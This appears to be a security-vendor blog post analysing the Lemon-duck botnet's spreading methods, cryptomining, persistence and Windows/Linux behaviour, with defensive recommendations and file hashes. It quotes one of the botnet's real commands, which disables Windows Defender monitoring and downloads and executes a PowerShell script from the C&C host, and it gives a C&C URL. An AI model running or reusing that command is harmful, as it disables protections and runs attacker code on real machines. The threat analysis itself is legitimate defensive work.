Community Blog How Can We Defend against Multiple Intrusion Methods on Multiple Platforms When Lemon-Duck Is Continuously Active?

How Can We Defend against Multiple Intrusion Methods on Multiple Platforms When Lemon-Duck Is Continuously Active?

This article offers some insight into protection against botnets and other Internet threats.

By Alibaba Cloud Security


Recently, Alibaba Cloud Security has monitored that a botnet called Lemon-duck, which uses various methods to spread, is continuously active. The botnet scans and intrudes the system by utilizing the EternalBlue, RDP brute-force attack, SSH brute-force attack, MS-SQL brute-force attack, Redis unauthorized access, and Hadoop unauthorized access. It also transforms and integrates the remote command execution vulnerability of WebLogic unauthorized access to spread on the Internet. In addition, it moves horizontally through SMB and NTLM to perform mining, back door remote control, and other functions, which are extremely harmful to the host and user assets.

Alibaba Cloud Security continues to monitor the botnet, and it has spread faster in recent days. Therefore, users must pay more attention to it.


Means of Spreading

Lemon-duck spreads through brute-force attacks on multiple services, remote command execution of unauthorized access, and lateral movement. The path is shown in the figure below:


Att &CK Analysis

Detailed Analysis

Lemon-duck has the remote command execution module of WebLogic unauthorized access. After Lemon-duck invades the WebLogic application, it downloads and executes Bash scripts through the URL: t.bb3u9.com/ln/core.png?logic.


Intrusions through SSH brute-force attack and RDP brute-force attack will run the following command:

cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:windowssystem32WindowsPowerShellv1.0powershell.exe&powershell IEX(New-Object Net.WebClient).DownloadString("http://t.bb3u9.com/rdp.jsp

We will analyze the behavior after intrusion into Linux and Windows platforms below.

Linux Platform

Lemon-duck will download a Bash script named core.png after intrusion on Linux platforms. Its function is to download the core Bash script, transmit the trapped host to the remote C&C terminal, and persist it through crontab.


Analysis of Core Bash Script

Use the host information carried in known_hosts, download the Bash script named core.png, and report the local host information to the remote control end:


In the localgo function, users, ports, and rsa keys are obtained through conifg, history files, processes, and configuration files. Then, batch spreading is attempted:


Traverse the username list ($userlist), host list ($hostlist), key list ($keylist), and SSH port list ($sshports) and spread:


The main functions in the script are summarized below:


Windows Platform

Analysis of Core PowerShell Script

The core PowerShell script file is obfuscated by three layers, and a readable PowerShell file is obtained after three times of anti-obfuscation. The file includes functions, such as collecting controlled host information, downloading scripts, binary files, and C&C communication. As shown in the figure below, Lemon-duck collects information about the system, network interface controller, and CPU of the information.


The types of system information above are spliced through the params parameter and sent to C&C:


The files to be downloaded include if.bin and kr.bin files. Both are PowerShell scripts:


if.bin Analysis

For the if.bin(md5: 0261b30c6773e4c04987bbe5090ba685) above, the PowerShell file is performed with anti-obfuscation processing. We can see that the file shown in the figure contains core spreading modules, including RDP, SSH, Redis, SMB, Yarn, and WebLogic command modules.


Call through each function module, such as calling logicexec for remote command execution of WebLogic unauthorized access:


Dump the local hash through the powerdump module:


Integrate with the weak password table:


Check whether the mimikatz and plink files exist locally. If they do not exist, download them through the download path:


The main functions in the script are summarized below:


kr.bin Analysis

Anti-obfuscation is performed on the PowerShell file of the preceding kr.bin(md5: b7a1cfd74661361f71856388dac5aaa6). The main function of this file is to establish a daemon role for continuous monitoring. Continuous monitoring of the program is shown in the figure:


The getprotected obtains the process ID by matching the mining files of m6g.bin.exe and m6.bin.exe with the path to protect its mining process:


ProcessSuspend is used to suspend a process:


Killer is a core function. Lemon-duck will traverse every process and end the processes in the list by matching them, such as Windows_update, Windows Managers, and Oracle Java Update. At the same time, Lemon-duck will kill other mining processes, such as MinerGate, minerd, Carbon, and javaupd. It will also traverse the external IP addresses through netstat and then interrupt the connection.


Security Solution

1) Avoid exposing the SSH and RDP of remote services to the entire network. We recommend allowing them through policy areas or specific IP addresses, upgrade software, or configuration in a timely manner for unfixed vulnerabilities and enabling the four-layer and seven-layer vulnerability protection and virtual patch functions at the same time.

2) Cloud Firewall provides targeted protection against high-risk cloud hazards, such as brute-force attacks, scanning, mining behaviors, and database intrusion. Lemon-duck uses various methods to attack the computer system, such as SSH brute-force attacks, RDP brute-force attacks, MS-SQL brute-force attacks, MS17-010 vulnerabilities in the four-layer network protocol, and remote command execution of Redis unauthorized access, Hadoop Yarn unauthorized access, and WebLogic unauthorized access in seven-layer network protocol. You can open the IPS protection module for defense with one click. As shown in the following figure, the overview page of Cloud Firewall provides historical data of the preceding scenarios:









a.asp: 576e06f3b4d78e6d0ab462da0eb70238 (bash shell)
ifbin: 0261b30c6773e4c04987bbe5090ba685 (powershell)
krbin: b7a1cfd74661361f71856388dac5aaa6 (powershell)

0 1 0
Share on

Alibaba Cloud Community

900 posts | 201 followers

You may also like